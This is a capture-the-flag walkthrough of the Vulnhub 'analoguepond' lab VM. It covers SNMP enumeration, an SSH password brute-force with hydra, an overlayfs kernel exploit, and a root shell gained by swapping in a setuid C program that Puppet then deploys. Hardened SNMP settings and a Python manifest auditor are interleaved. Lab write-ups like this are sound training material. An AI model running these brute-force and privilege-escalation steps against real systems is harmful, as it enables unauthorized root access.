
[Vulnhub] analoguepond - Walkthrough Part 1

You can find the VM download link here.


First I welcomed it with a straightforward nmap scan:

nmap -A

I didn't find any open port in the first round. Then I tried a UDP scan and found port 161 open.

root@kali:~/vulnerhub/analoguepond# nmap -sU

Starting Nmap 7.50 ( https://nmap.org ) at 2017-08-09 16:05 EDT

Nmap scan report for
Host is up (0.00039s latency).
Not shown: 998 closed ports
68/udp  open|filtered dhcpc
161/udp open          snmp
MAC Address: 08:00:27:0A:79:7F (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 1086.52 seconds

It's an SNMP service. Let's try to gather some information about it.

root@kali:~/vulnerhub# snmp-check
snmp-check v1.9 - SNMP enumerator
Copyright (c) 2005-2015 by Matteo Cantoni (www.nothink.org)

[+] Try to connect to using SNMPv1 and community 'public'

[*] System information:

  Host IP address               :
  Hostname                      : analoguepond
  Description                   : Linux analoguepond 3.19.0-25-generic #26~14.04.1-Ubuntu SMP Fri Jul 24 21:16:20 UTC 2015 x86_64
  Contact                       : Eric Burdon <eric@example.com>
  Location                      : There is a house in New Orleans they call it...
  Uptime snmp                   : 15:46:07.20
  Uptime system                 : 15:45:30.22
  System date                   : 2017-8-9 17:59:18.0

I also tried other ways, like nmap:

root@kali:~/vulnerhub# ls /usr/share/nmap/scripts/ | grep snmp
root@kali:~/vulnerhub# nmap -sU -Pn -p 161 --script=snmp-brute.nse

Starting Nmap 7.50 ( https://nmap.org ) at 2017-08-09 16:22 EDT
Nmap scan report for
Host is up (-0.17s latency).

161/udp open  snmp
| snmp-brute: 
|_  public - Valid credentials
MAC Address: 08:00:27:0A:79:7F (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 1.99 seconds

There we found the community name 'public', so we can try snmpwalk:

root@kali:~/vulnerhub# snmpwalk -v 1 -c public
iso. = STRING: "Linux analoguepond 3.19.0-25-generic #26~14.04.1-Ubuntu SMP Fri Jul 24 21:16:20 UTC 2015 x86_64"
iso. = OID: iso.
iso. = Timeticks: (5719592) 15:53:15.92
iso. = STRING: "Eric Burdon <eric@example.com>"
iso. = STRING: "analoguepond"
iso. = STRING: "There is a house in New Orleans they call it..."
iso. = INTEGER: 72
iso. = Timeticks: (10) 0:00:00.10
iso. = OID: iso.
iso. = OID: iso.
iso. = OID: iso.
iso. = OID: iso.
iso. = OID: iso.
iso. = OID: iso.
iso. = OID: iso.
iso. = OID: iso.
iso. = OID: iso.
iso. = OID: iso.
iso. = STRING: "The MIB for Message Processing and Dispatching."
iso. = STRING: "The management information definitions for the SNMP User-based Security Model."
iso. = STRING: "The SNMP Management Architecture MIB."
iso. = STRING: "The MIB module for SNMPv2 entities"
iso. = STRING: "The MIB module for managing TCP implementations"
iso. = STRING: "The MIB module for managing IP and ICMP implementations"
iso. = STRING: "The MIB module for managing UDP implementations"
iso. = STRING: "View-based Access Control Model for SNMP."
iso. = STRING: "The MIB modules for managing SNMP Notification, plus filtering."
iso. = STRING: "The MIB module for logging SNMP Notifications."
iso. = Timeticks: (10) 0:00:00.10
iso. = Timeticks: (10) 0:00:00.10
iso. = Timeticks: (10) 0:00:00.10
iso. = Timeticks: (10) 0:00:00.10
iso. = Timeticks: (10) 0:00:00.10
iso. = Timeticks: (10) 0:00:00.10
iso. = Timeticks: (10) 0:00:00.10
iso. = Timeticks: (10) 0:00:00.10
iso. = Timeticks: (10) 0:00:00.10
iso. = Timeticks: (10) 0:00:00.10
iso. = Timeticks: (5723292) 15:53:52.92
iso. = Hex-STRING: 07 E1 08 09 12 07 04 00 2B 01 00 
iso. = INTEGER: 393216
iso. = STRING: "BOOT_IMAGE=/vmlinuz-3.19.0-25-generic root=/dev/mapper/analoguepond--vg-root ro
iso. = Gauge32: 3
iso. = Gauge32: 43
iso. = INTEGER: 0
End of MIB

Looks like we got tons of information here.
I noticed this line: iso. = STRING: "BOOT_IMAGE=/vmlinuz-3.19.0-25-generic root=/dev/mapper/analoguepond--vg-root ro. It says the permission is ro (read-only), so it's more likely we find information than exploit this SNMP service.
There is a username, eric: iso. = STRING: "Eric Burdon <eric@example.com>"
And there is something like a hint: iso. = STRING: "There is a house in New Orleans they call it..."
Googled it; the hint should refer to this:

There is a house in New Orleans 
They call the Rising Sun

So suppose it's the password; let's try it:

root@kali:~/vulnerhub/analoguepond# cat pass
rising sun
the rising sun
house of the rising sun

root@kali:~/vulnerhub/analoguepond# john --wordlist:pass --rules --stdout > pass1
Press 'q' or Ctrl-C to abort, almost any other key for status
157p 0:00:00:00 100.00% (2017-08-09 16:39) 872.2p/s Houseoftherisingsuning
root@kali:~/vulnerhub/analoguepond# hydra -l eric -P pass1 ssh
Hydra v8.5 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2017-08-09 16:39:55
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 157 login tries (l:1/p:157), ~10 tries per task
[DATA] attacking service ssh on port 22
[22][ssh] host:   login: eric   password: therisingsun
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2017-08-09 16:39:58
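From the defender's side, the whole chain above rested on an SNMP agent that answered any host with the v1/v2c community 'public' and carried a user name and a password hint in sysContact and sysLocation. As an added example (not part of this walkthrough or of the VM's real configuration; the user name, passphrases, address and view are placeholders), a net-snmp snmpd.conf contrasting what was exposed with a locked-down setting:

```conf
# --- What analoguepond effectively exposed: anyone who sends 'public' reads the tree ---
rocommunity public

# --- Hardened replacement (every name and value below is a placeholder) ---
# Listen only where monitoring actually comes from, not on every interface.
agentAddress udp:127.0.0.1:161,udp:192.0.2.10:161

# No v1/v2c communities at all: one SNMPv3 user, authenticated and encrypted.
createUser monitor SHA "REPLACE-with-a-long-auth-passphrase" AES "REPLACE-with-a-long-priv-passphrase"

# Read-only, encryption required, and limited to a narrow view instead of the whole MIB.
rouser monitor priv -V systemonly
# system group (sysDescr, sysContact, sysLocation, ...)
view systemonly included .1.3.6.1.2.1.1
# hrSystem (uptime, date, process count)
view systemonly included .1.3.6.1.2.1.25.1

# These two fields are readable by every permitted manager: a role mailbox and a
# physical location, never a personal account or anything resembling a hint.
sysContact  ops@example.com
sysLocation Rack 12, server room 3
```

With this in place the snmp-brute and snmpwalk steps above return nothing usable, and the sysContact value no longer hands out a login name.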

I'm in.

root@kali:~/vulnerhub/analoguepond# ssh eric@
eric@'s password: 
Welcome to Ubuntu 14.04.5 LTS (GNU/Linux 3.19.0-25-generic x86_64)

 * Documentation:  https://help.ubuntu.com/

 System information disabled due to load higher than 1.0
eric@analoguepond:~$ ls

I tunneled it out to my Kali box; it's only a picture, and nothing special turned up after trying some tools on it.
Then I did a find looking for a way to escalate privileges, but nothing special there either.
Then I checked the kernel version and found it's an old, vulnerable kernel.

eric@analoguepond:~$ uname -a
Linux analoguepond 3.19.0-25-generic #26~14.04.1-Ubuntu SMP Fri Jul 24 21:16:20 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux

So I downloaded the overlayfs exploit here, compiled it, ran it, and we got root.

eric@analoguepond:~$ ./ofs
root@analoguepond:~# whoami
root@analoguepond:~# id
uid=0(root) gid=1000(eric) groups=0(root),4(adm),24(cdrom),30(dip),46(plugdev),111(libvirtd),112(lpadmin),113(sambashare),1000(eric)

Navigated to /root, found this:

root@analoguepond:/root# ls
root@analoguepond:/root# cat flag.txt 
C'Mon Man! Y'all didn't think this was the final flag so soon...?

Did the bright lights and big city knock you out...? If you pull
a stunt like this again, I'll send you back to Walker...

This is obviously troll flag #1, so keep going.

Ok then, let's dig deeper. Check the network status:

root@analoguepond:/root# netstat -nplt
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0*               LISTEN      1214/dnsmasq    
tcp        0      0    *               LISTEN      932/sshd        
tcp        0      0*               LISTEN      1224/qemu-system-x8
tcp        0      0*               LISTEN      1260/qemu-system-x8
tcp6       0      0 :::22                   :::*                    LISTEN      932/sshd        

Ports 5900 and 5901 attracted me first because I've been poking around with my Raspberry Pi recently; these two ports are used by VNC. So I wanted to connect just out of curiosity, but it failed because it asked me for a password and I still had nothing at that point.

I also noticed that the box is connected to another network. I wanted to scan that network, but obviously I can't run nmap or netdiscover on the victim, so I chose to ping.

root@analoguepond:/tmp# cat pingall.sh 
#!/bin/sh
# Program name: pingall.sh
# Reads one IP per line (from the file given as $1, or from stdin) and prints the ones that answer a single ping.
trap 'exit 1;' INT
while IFS= read -r ip; do
    if ping -c 1 -W 1 "$ip" > /dev/null 2>&1; then
        echo "$ip"          # host is up
    fi
    # hosts that are down are simply not printed
done < "${1:-/dev/stdin}"

root@analoguepond:/tmp# seq -f "192.168.122.%g" 1 254 |./pingall.sh 
Wed Aug  9 18:46:12 BST 2017

Here I got three hosts up, and .1 is me.
Then, honestly, I had no idea what to do next for a long time, and finally I tried to SSH to it...

root@analoguepond:/etc# ssh
| Passwords are very dated.. Removing spaces helps sandieshaw log in with her |
| most famous song                                                            |

A sweet hint. :D
So, username: sandieshaw; password: just google it and you'll find it's 'puppet on a string', then remove the spaces -> 'puppetonastring'.

sandieshaw@'s password: 
Welcome to Ubuntu 14.04.3 LTS (GNU/Linux 4.4.0-57-generic x86_64)

 * Documentation:  https://help.ubuntu.com/

  System information as of Wed Aug  9 16:33:33 BST 2017

  System load:  0.19              Processes:           116
  Usage of /:   68.6% of 1.58GB   Users logged in:     1
  Memory usage: 20%               IP address for eth0:
  Swap usage:   0%

  Graph this data and manage this system at:

Nice, I'm in.

Here I found a private key, but I didn't know what it was for or whether it would be useful, so I just left it there.

sandieshaw@puppet:~/.puppet/ssl/private_keys$ cat puppet.example.com.pem 

Do a find:

sandieshaw@puppet:~$ find / -xdev -perm /6000 \( -user root -o -group root \) 2>/dev/null

There is an interesting file, /tmp/spin.
But when I run it, there is only a cursor spinning forever. I tried radare to reverse it, and other small tools, with no luck.

There I was stuck again. After viewing others' walkthroughs, I navigated to /etc and found /etc/puppet:

sandieshaw@puppet:/etc/puppet$ ls
auth.conf     etckeeper-commit-post  files	      manifests  puppet.conf
environments  etckeeper-commit-pre   fileserver.conf  modules	 templates
sandieshaw@puppet:/etc/puppet/modules$ ls
fiveeights  vulnhub  wiggle
sandieshaw@puppet:/etc/puppet/modules$ cd wiggle/
sandieshaw@puppet:/etc/puppet/modules/wiggle$ ls
files  manifests
sandieshaw@puppet:/etc/puppet/modules/wiggle$ cd files/
sandieshaw@puppet:/etc/puppet/modules/wiggle/files$ ls
spin  spin.c

There are many interesting files here. First, Puppet is a configuration-management system that lets administrators automatically distribute files to the hosts it manages and keep them in the declared state.
Second, there is a spin.c for us:

#include <stdio.h>
#include <unistd.h>

/* Print the next spinner character and return the cursor to column 0. */
void advance_spinner(void) {
    static char bars[] = { '/', '-', '\\', '|' };
    static int nbars = sizeof(bars) / sizeof(char);
    static int pos = 0;

    printf("%c\r", bars[pos]);
    fflush(stdout);          /* no newline is printed, so flush or nothing shows */
    pos = (pos + 1) % nbars;
}

int main(void) {
    while (1) {
        advance_spinner();
        usleep(100000);      /* loop body was lost in extraction; the delay value is assumed */
    }
    return 0;
}

But I couldn't find an easy way to exploit it. Then I found this file:

sandieshaw@puppet:/etc/puppet/modules/wiggle/manifests$ cat init.pp 
## My first puppet module by Nick Leeson (C) Barringsbank
## Put spin binary in /tmp to confirm puppet is working
class wiggle {

file { [ "/tmp/spin" ]:
  ensure  => present,
  mode    => 4755,
  owner   => root,
  group   => root,
  source  => "puppet:///modules/wiggle/spin";
}

}


Honestly, I learned this from others' walkthroughs.
But here I know that /tmp/spin is synchronized from the module's files/spin (I guess files/ is a default path in Puppet).
Which means we can write another spin file, and Puppet would replace /tmp/spin with it and grant it the setuid (4000) bit, which is good.

#include <stdio.h>
#include <unistd.h>

/* Dropped into the module's files/ directory so Puppet deploys it as /tmp/spin. */
int main(void) {
    char *const argv[] = { "sh", NULL };
    execvp("/bin/sh", argv);   /* only returns on failure */
    perror("execvp");
    return 1;
}

Then wait for Puppet to push our new /tmp/spin, and run it.

sandieshaw@puppet:/tmp$ ./spin 
# whoami
# id
uid=1000(sandieshaw) gid=1000(sandieshaw) euid=0(root) groups=0(root),4(adm),24(cdrom),30(dip),46(plugdev),110(lpadmin),111(sambashare),1000(sandieshaw)

Got the root!
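The weakness the escalation above rests on is a manifest that installs a setuid-root binary from a module source path a non-root user could overwrite: Puppet faithfully redeploys whatever sits in the module's files/ directory. As an added example (not part of this walkthrough or of the VM), a small Python audit that flags such file resources in manifest text and maps each puppet:/// source back to the on-disk path whose write permissions must be checked; the /etc/puppet/modules module path and the sample manifest are assumptions/constructed:

```python
import re

SETUID, SETGID = 0o4000, 0o2000

# One `file { <title(s)>: <attrs> }` resource; the attribute body ends at the first ';' or '}'.
FILE_RES_RE = re.compile(
    r"file\s*\{\s*(?P<title>\[[^\]]*\]|\"[^\"]*\"|'[^']*')\s*:\s*(?P<body>.*?)[;}]", re.S)
ATTR_RE = re.compile(r"(?P<key>\w+)\s*=>\s*(?P<val>[^,;\n}]+)")

def _unquote(value):
    return value.strip().strip("\"'")

def parse_mode(raw):
    """Numeric Puppet modes (4755, '0644', "755") -> int; symbolic modes such as u+s -> None."""
    raw = _unquote(raw)
    return int(raw, 8) if re.fullmatch(r"[0-7]{3,4}", raw) else None

def module_source_to_path(source, modulepath="/etc/puppet/modules"):
    """Map puppet:///modules/<mod>/<file> to the path the master serves it from (modulepath assumed)."""
    m = re.fullmatch(r"puppet:///modules/([^/]+)/(.+)", _unquote(source))
    return f"{modulepath}/{m.group(1)}/files/{m.group(2)}" if m else None

def audit_manifest(text):
    """One finding per managed path whose mode sets setuid or setgid; 'serve_from' is the
    on-disk source whose write permissions decide who controls the privileged binary."""
    findings = []
    for res in FILE_RES_RE.finditer(text):
        attrs = {m["key"]: m["val"] for m in ATTR_RE.finditer(res["body"])}
        mode = parse_mode(attrs.get("mode", ""))
        if mode is None or not mode & (SETUID | SETGID):
            continue
        src = attrs.get("source", "")
        for path in re.findall(r"[\"']([^\"']+)[\"']", res["title"]):
            findings.append({"path": path, "mode": f"{mode:04o}",
                             "owner": _unquote(attrs.get("owner", "root (puppet default)")),
                             "source": _unquote(src),
                             "serve_from": module_source_to_path(src) or ""})
    return findings

# Constructed sample: the wiggle manifest from the box plus one harmless resource.
SAMPLE_MANIFEST = """class wiggle {
  file { [ "/tmp/spin" ]:
    ensure  => present,
    mode    => 4755,
    owner   => root,
    group   => root,
    source  => "puppet:///modules/wiggle/spin";
  }
  file { '/etc/motd': ensure => file, mode => '0644', source => 'puppet:///modules/wiggle/motd' }
}"""
```

On a real master, run audit_manifest over every .pp under the module path and then stat each reported serve_from path for group or world write bits; here it reports only /tmp/spin, sourced from /etc/puppet/modules/wiggle/files/spin.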

# pwd
# ls -la
total 24
drwxr-xr-x 3 root root 4096 Dec 21  2016 .
drwx------ 4 root root 4096 Jan  7  2017 ..
-rw-r--r-- 1 root root  401 Dec 21  2016 flag1.txt.0xff
drwxr-xr-x 3 root root 4096 Dec 21  2016 .I_have_you_now
-rw-r--r-- 1 root root   39 Dec 17  2016 jim
-rw-r--r-- 1 root root   53 Dec 17  2016 melvin
# cat flag1.txt.0xff

Finally, we got the first flag. So, this is a good point to end part 1 and I'll publish part 2 later.

Thanks for watching.
